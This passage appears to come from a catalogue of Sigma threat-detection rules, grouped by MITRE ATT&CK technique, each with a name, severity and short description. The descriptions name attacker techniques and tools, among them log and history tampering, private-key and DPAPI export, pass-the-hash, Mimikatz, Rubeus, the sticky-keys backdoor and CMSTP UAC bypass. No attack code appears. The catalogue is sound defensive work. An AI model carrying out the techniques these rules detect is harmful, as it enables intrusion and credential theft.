  • Scheduled Cron Task/Job - MacOs - Level: medium
    Description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
attack.t1070.003 7
Show Rules (7)
  • Linux Command History Tampering - Level: high
    Description: Detects commands that try to clear or tamper with the Linux command history. This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
  • Cisco Clear Logs - Level: high
    Description: Clear command history in network OS which is used for defense evasion
  • Clear PowerShell History - PowerShell Module - Level: medium
    Description: Detects keywords that could indicate clearing PowerShell history
  • Clearing Windows Console History - Level: high
    Description: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
  • Clear PowerShell History - PowerShell - Level: medium
    Description: Detects keywords that could indicate clearing PowerShell history
  • Disable Powershell Command History - Level: high
    Description: Detects scripts or commands that disabled the Powershell command history by removing psreadline module
  • Suspicious IO.FileStream - Level: medium
    Description: Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
attack.t1059.002 7
Show Rules (7)
  • MacOS Scripting Interpreter AppleScript - Level: medium
    Description: Detects execution of AppleScript of the macOS scripting language AppleScript.
  • Clipboard Data Collection Via OSAScript - Level: high
    Description: Detects possible collection of data from the clipboard via execution of the osascript binary
  • JXA In-memory Execution Via OSAScript - Level: high
    Description: Detects possible malicious execution of JXA in-memory via OSAScript
  • Suspicious Microsoft Office Child Process - MacOS - Level: high
    Description: Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution
  • OSACompile Run-Only Execution - Level: high
    Description: Detects potential suspicious run-only executions compiled using OSACompile
  • Osacompile Execution By Potentially Suspicious Applet/Osascript - Level: medium
    Description: Detects potential suspicious applet or osascript executing "osacompile".
  • Suspicious Execution via macOS Script Editor - Level: medium
    Description: Detects when the macOS Script Editor utility spawns an unusual child process.
attack.t1552.004 7
Show Rules (7)
  • Cisco Crypto Commands - Level: high
    Description: Show when private keys are being exported from the device, or when new certificates are installed
  • DPAPI Backup Keys And Certificate Export Activity IOC - Level: high
    Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
  • Suspicious PFX File Creation - Level: medium
    Description: A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.
  • Certificate Exported Via PowerShell - ScriptBlock - Level: medium
    Description: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • Certificate Exported Via PowerShell - Level: medium
    Description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
  • PowerShell Get-Process LSASS - Level: high
    Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
  • Private Keys Reconnaissance Via CommandLine Tools - Level: medium
    Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
attack.t1557.001 7
Show Rules (7)
  • Potential PetitPotam Attack Via EFS RPC Calls - Level: medium
    Description: Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
  • RottenPotato Like Attack Pattern - Level: high
    Description: Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like
  • Local Privilege Escalation Indicator TabTip - Level: high
    Description: Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode
  • WinDivert Driver Load - Level: high
    Description: Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows
  • HackTool - ADCSPwn Execution - Level: high
    Description: Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service
  • HackTool - Impacket Tools Execution - Level: high
    Description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
  • Potential SMB Relay Attack Tool Execution - Level: critical
    Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
attack.t1218.003 7
Show Rules (7)
  • DLL Loaded From Suspicious Location Via Cmspt.EXE - Level: high
    Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
  • Outbound Network Connection Initiated By Cmstp.EXE - Level: high
    Description: Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • CMSTP Execution Process Creation - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Bypass UAC via CMSTP - Level: high
    Description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
  • CMSTP UAC Bypass via COM Object Access - Level: high
    Description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
  • CMSTP Execution Registry Event - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
attack.t1546.008 7
Show Rules (7)
  • Potential Privilege Escalation Using Symlink Between Osk and Cmd - Level: high
    Description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.
  • Persistence Via Sticky Key Backdoor - Level: critical
    Description: By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.
  • Sticky Key Like Backdoor Execution - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
  • Suspicious Debugger Registration Cmdline - Level: high
    Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Potential Windows Defender Tampering Via Wmic.EXE - Level: high
    Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
  • Sticky Key Like Backdoor Usage - Registry - Level: critical
    Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
attack.t1078.003 6
Show Rules (6)
  • User Added To Admin Group - MacOS - Level: medium
    Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
  • User Added To Admin Group Via Dscl - Level: medium
    Description: Detects attempts to create and add an account to the admin group via "dscl"
  • User Added To Admin Group Via DseditGroup - Level: medium
    Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • User Added To Admin Group Via Sysadminctl - Level: medium
    Description: Detects attempts to create and add an account to the admin group via "sysadminctl"
  • Admin User Remote Logon - Level: low
    Description: Detect remote login by Administrator user (depending on internal pattern).
attack.t1565.001 6
Show Rules (6)
  • Azure Device or Configuration Modified or Deleted - Level: medium
    Description: Identifies when a device or device configuration in azure is modified or deleted.
  • Azure DNS Zone Modified or Deleted - Level: medium
    Description: Identifies when DNS zone is modified or deleted.
  • Commands to Clear or Remove the Syslog - Builtin - Level: high
    Description: Detects specific commands commonly used to remove or empty the syslog
  • History File Deletion - Level: high
    Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
  • Potential Suspicious Change To Sensitive/Critical Files - Level: medium
    Description: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.
  • Cisco Denial of Service - Level: medium
    Description: Detect a system being shutdown or put into different boot mode
attack.t1070.006 6
Show Rules (6)
  • File Time Attribute Change - Linux - Level: medium
    Description: Detect file time attribute change to hide new or changes to existing files.
  • Touch Suspicious Service File - Level: medium
    Description: Detects usage of the "touch" process in service file.
  • File Time Attribute Change - Level: medium
    Description: Detect file time attribute change to hide new or changes to existing files
  • Unauthorized System Time Modification - Level: low
    Description: Detect scenarios where a potentially unauthorized application or user is modifying the system time.
  • File Creation Date Changed to Another Year - Level: high
    Description: Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system. Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
  • Powershell Timestomp - Level: medium
    Description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
attack.t1550.002 6
Show Rules (6)
  • NTLM Logon - Level: low
    Description: Detects logons using NTLM, which could be caused by a legacy source or attackers
  • Hacktool Ruler - Level: high
    Description: This events that are generated when using the hacktool Ruler by Sensepost
  • Successful Overpass the Hash Attempt - Level: high
    Description: Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.
  • Pass the Hash Activity 2 - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
  • NTLMv1 Logon Between Client and Server - Level: medium
    Description: Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.
  • Potential Pass the Hash Activity - Level: medium
    Description: Detects the attack technique pass the hash which is used to move laterally inside the network
attack.t1090.001 6
Show Rules (6)
  • RDP over Reverse SSH Tunnel WFP - Level: high
    Description: Detects svchost hosting RDP termsvcs communicating with the loopback address
  • Cloudflared Portable Execution - Level: medium
    Description: Detects the execution of the "cloudflared" binary from a non standard location.
  • Cloudflared Quick Tunnel Execution - Level: medium
    Description: Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.
  • HackTool - SharpChisel Execution - Level: high
    Description: Detects usage of the Sharp Chisel via the commandline arguments
  • PUA - Chisel Tunneling Tool Execution - Level: high
    Description: Detects usage of the Chisel tunneling tool via the commandline arguments
  • Renamed Cloudflared.EXE Execution - Level: high
    Description: Detects the execution of a renamed "cloudflared" binary.
attack.t1552.006 6
Show Rules (6)
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications - Level: medium
    Description: Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.
  • Findstr GPP Passwords - Level: high
    Description: Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.
  • LSASS Process Reconnaissance Via Findstr.EXE - Level: high
    Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID
  • Permission Misconfiguration Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This was seen being used in combination with "icacls" and other utilities to spot misconfigured files or folders permissions.
  • Suspicious SYSVOL Domain Group Policy Access - Level: medium
    Description: Detects Access to Domain Group Policies stored in SYSVOL
  • Access To Sysvol Policies Share By Uncommon Process - Level: medium
    Description: Detects file access requests to the Windows Sysvol Policies Share by uncommon processes
attack.t1027.004 6
Show Rules (6)
  • Dynamic CSharp Compile Artefact - Level: low
    Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
  • Dynamic .NET Compilation Via Csc.EXE - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • Potential Application Whitelisting Bypass via Dnx.EXE - Level: medium
    Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
  • Visual Basic Command Line Compiler Usage - Level: high
    Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
  • Dynamic .NET Compilation Via Csc.EXE - Hunting - Level: medium
    Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
attack.t1218.001 6
Show Rules (6)
  • HH.EXE Execution - Level: low
    Description: Detects the execution of "hh.exe" to open ".chm" files.
  • Remote CHM File Download/Execution Via HH.EXE - Level: high
    Description: Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • OneNote.EXE Execution of Malicious Embedded Scripts - Level: high
    Description: Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories.
  • HH.EXE Initiated HTTP Network Connection - Level: medium
    Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
attack.t1546.011 6
Show Rules (6)
  • Potential Shim Database Persistence via Sdbinst.EXE - Level: medium
    Description: Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
  • Uncommon Extension Shim Database Installation Via Sdbinst.EXE - Level: medium
    Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
  • Potential Persistence Via AppCompat RegisterAppRestart Layer - Level: medium
    Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.
  • Suspicious Shim Database Patching Activity - Level: high
    Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
  • Potential Persistence Via Shim Database In Uncommon Location - Level: high
    Description: Detects the installation of a new shim database where the file is located in a non-default location
  • Potential Persistence Via Shim Database Modification - Level: medium
    Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time
attack.t1564.002 5
Show Rules (5)
  • User Account Hidden By Registry - Level: high
    Description: Detect modification for a specific user to prevent that user from being listed on the logon screen
  • Hidden User Creation - Level: medium
    Description: Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
  • Hiding User Account Via SpecialAccounts Registry Key - CommandLine - Level: medium
    Description: Detects changes to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy
  • Hiding User Account Via SpecialAccounts Registry Key - Level: high
    Description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.
attack.t1213.003 5
Show Rules (5)
  • Bitbucket Full Data Export Triggered - Level: high
    Description: Detects when full data export is attempted.
  • Bitbucket Unauthorized Full Data Export Triggered - Level: critical
    Description: Detects when full data export is attempted an unauthorized user.
  • Github Delete Action Invoked - Level: medium
    Description: Detects delete action in the Github audit logs for codespaces, environment, project and repo.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed or when an owner removes an outside collaborator from an organization or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Github Self Hosted Runner Changes Detected - Level: low
    Description: A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runners configurations in the environment. The self-hosted runner configuration changes once detected, it should be validated from GitHub UI because the log entry may not provide full context.
attack.t1562.006 5
Show Rules (5)
  • Okta User Session Start Via An Anonymising Proxy Service - Level: high
    Description: Detects when an Okta user session starts where the user is behind an anonymising proxy service.
  • Auditing Configuration Changes on Linux Host - Level: high
    Description: Detect changes in auditd configuration files
  • Logging Configuration Changes on Linux Host - Level: high
    Description: Detect changes of syslog daemons configuration files
  • Disable of ETW Trace - Powershell - Level: high
    Description: Detects usage of powershell cmdlets to disable or remove ETW trace sessions
  • ETW Trace Evasion Activity - Level: high
    Description: Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
attack.t1027.003 5
Show Rules (5)
  • Steganography Hide Zip Information in Picture File - Level: low
    Description: Detects appending of zip file to image
  • Steganography Hide Files with Steghide - Level: low
    Description: Detects embedding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
  • Steganography Extract Files with Steghide - Level: low
    Description: Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.
  • Steganography Unzip Hidden Information From Picture File - Level: low
    Description: Detects extracting of zip file from image file
  • Findstr Launching .lnk File - Level: medium
    Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
attack.t1505.004 5
Show Rules (5)
  • ETW Logging/Processing Option Disabled On IIS Server - Level: medium
    Description: Detects changes to of the IIS server configuration in order to disable/remove the ETW logging/processing option.
  • HTTP Logging Disabled On IIS Server - Level: high
    Description: Detects changes to of the IIS server configuration in order to disable HTTP logging for successful requests.
  • New Module Module Added To IIS Server - Level: medium
    Description: Detects the addition of a new module to an IIS server.
  • Previously Installed IIS Module Was Removed - Level: low
    Description: Detects the removal of a previously installed IIS module.
  • Suspicious IIS Module Registration - Level: high
    Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
attack.t1218.009 4
Show Rules (4)
  • Possible Applocker Bypass - Level: low
    Description: Detects execution of executables that can be used to bypass Applocker whitelisting
  • RegAsm.EXE Initiating Network Connection To Public IP - Level: medium
    Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
  • Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension - Level: medium
    Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.
  • Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location - Level: medium
    Description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location
attack.t1552.007 4
Show Rules (4)
  • Kubernetes Admission Controller Modification - Level: medium
    Description: Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
  • Kubernetes Secrets Enumeration - Level: low
    Description: Detects enumeration of Kubernetes secrets.
  • Azure Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
  • Google Cloud Kubernetes Admission Controller - Level: medium
    Description: Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.
attack.t1550.001 4
Show Rules (4)
  • AWS Console GetSigninToken Potential Abuse - Level: medium
    Description: Detects potentially suspicious events involving "GetSigninToken". An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request.
  • AWS STS AssumeRole Misuse - Level: low
    Description: Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.
  • AWS STS GetSessionToken Misuse - Level: low
    Description: Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.
  • AWS Suspicious SAML Activity - Level: medium
    Description: Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.
attack.t1136.003 4
Show Rules (4)
  • AWS ElastiCache Security Group Created - Level: low
    Description: Detects when an ElastiCache security group has been created.
  • New Github Organization Member Added - Level: informational
    Description: Detects when a new member is added or invited to a github organization.
  • New Federated Domain Added - Level: medium
    Description: Detects the addition of a new Federated Domain.
  • New Federated Domain Added - Exchange - Level: medium
    Description: Detects the addition of a new Federated Domain.
attack.t1021.004 4
Show Rules (4)
  • Bitbucket Global SSH Settings Changed - Level: medium
    Description: Detects Bitbucket global SSH access configuration changes.
  • Bitbucket User Login Failure Via SSH - Level: medium
    Description: Detects SSH user login access failures. Please note that this rule can be noisy and is recommended to use with correlation based on "author.name" field.
  • OpenSSH Server Listening On Socket - Level: medium
    Description: Detects scenarios where an attacker enables the OpenSSH server and server starts to listening on SSH socket.
  • Port Forwarding Activity Via SSH.EXE - Level: medium
    Description: Detects port forwarding activity via SSH.exe
attack.t1222.002 4
Show Rules (4)
  • Remove Immutable File Attribute - Auditd - Level: medium
    Description: Detects removing immutable file attribute.
  • File or Folder Permissions Change - Level: low
    Description: Detects file and folder permission changes.
  • Remove Immutable File Attribute - Level: medium
    Description: Detects usage of the 'chattr' utility to remove immutable file attribute.
  • Chmod Suspicious Directory - Level: medium
    Description: Detects chmod targeting files in abnormal directory paths.
attack.t1102.001 4
Show Rules (4)
  • PwnDrp Access - Level: critical
    Description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
  • Raw Paste Service Access - Level: high
    Description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
  • Network Connection Initiated To AzureWebsites.NET By Non-Browser Process - Level: medium
    Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
  • New Connection Initiated To Potential Dead Drop Resolver Domain - Level: high
    Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
attack.t1222.001 4
Show Rules (4)
  • AD Object WriteDAC Access - Level: critical
    Description: Detects WRITE_DAC access to a domain object
  • Suspicious Recursive Takeown - Level: medium
    Description: Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
  • WannaCry Ransomware Activity - Level: critical
    Description: Detects WannaCry ransomware activity
  • File or Folder Permissions Modifications - Level: medium
    Description: Detects a file or folder's permissions being modified or tampered with.
attack.t1547.009 4
Show Rules (4)
  • Windows Network Access Suspicious desktop.ini Action - Level: medium
    Description: Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
  • New Custom Shim Database Created - Level: medium
    Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
  • Creation Exe for Service with Unquoted Path - Level: high
    Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
  • Suspicious desktop.ini Action - Level: medium
    Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
attack.t1552.002 4
Show Rules (4)
  • SAM Registry Hive Handle Request - Level: high
    Description: Detects handles requested to SAM registry hive
  • Enumeration for 3rd Party Creds From CLI - Level: medium
    Description: Detects processes that query known 3rd party registry keys that holds credentials via commandline
  • Enumeration for Credentials in Registry - Level: medium
    Description: Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
  • Remote Registry Management Using Reg Utility - Level: medium
    Description: Remote registry management using REG utility from non-admin workstation
attack.t1027.005 4
Show Rules (4)
  • Potential Secure Deletion with SDelete - Level: medium
    Description: Detects files that have extensions commonly seen while SDelete is used to wipe files.
  • HackTool - CrackMapExec PowerShell Obfuscation - Level: high
    Description: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
  • PUA - DefenderCheck Execution - Level: high
    Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.
  • PUA - Potential PE Metadata Tamper Using Rcedit - Level: medium
    Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
attack.t1484.001 4
Show Rules (4)
  • Group Policy Abuse for Privilege Addition - Level: medium
    Description: Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
  • Startup/Logon Script Added to Group Policy Object - Level: medium
    Description: Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
  • Modify Group Policy Settings - ScriptBlockLogging - Level: medium
    Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
  • Modify Group Policy Settings - Level: medium
    Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
attack.t1559.001 4
Show Rules (4)
  • DNS Query Request By Regsvr32.EXE - Level: medium
    Description: Detects DNS queries initiated by "Regsvr32.exe"
  • Network Connection Initiated By Regsvr32.EXE - Level: medium
    Description: Detects a network connection initiated by "Regsvr32.exe"
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
attack.t1555.004 4
Show Rules (4)
  • Access To Windows Credential History File By Uncommon Applications - Level: medium
    Description: Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
  • Access To Windows DPAPI Master Keys By Uncommon Applications - Level: medium
    Description: Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
  • Suspicious Key Manager Access - Level: high
    Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
  • Windows Credential Manager Access via VaultCmd - Level: medium
    Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
attack.t1546.002 4
Show Rules (4)
  • Suspicious Screensaver Binary File Creation - Level: medium
    Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
  • Writing Local Admin Share - Level: medium
    Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
  • Suspicious ScreenSave Change by Reg.exe - Level: medium
    Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
  • Path To Screensaver Binary Modified - Level: medium
    Description: Detects value modification of registry key containing path to binary used as screensaver.
attack.t1137.006 4
Show Rules (4)
  • Potential Persistence Via Microsoft Office Add-In - Level: high
    Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
  • Code Executed Via Office Add-in XLL File - Level: high
    Description: Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs
  • Potential Persistence Via Excel Add-in - Registry - Level: high
    Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
  • Potential Persistence Via Visual Studio Tools for Office - Level: medium
    Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
attack.t1550.003 4
Show Rules (4)
  • Uncommon Outbound Kerberos Connection - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • HackTool - KrbRelayUp Execution - Level: high
    Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters
attack.t1074.001 4
Show Rules (4)
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module - Level: medium
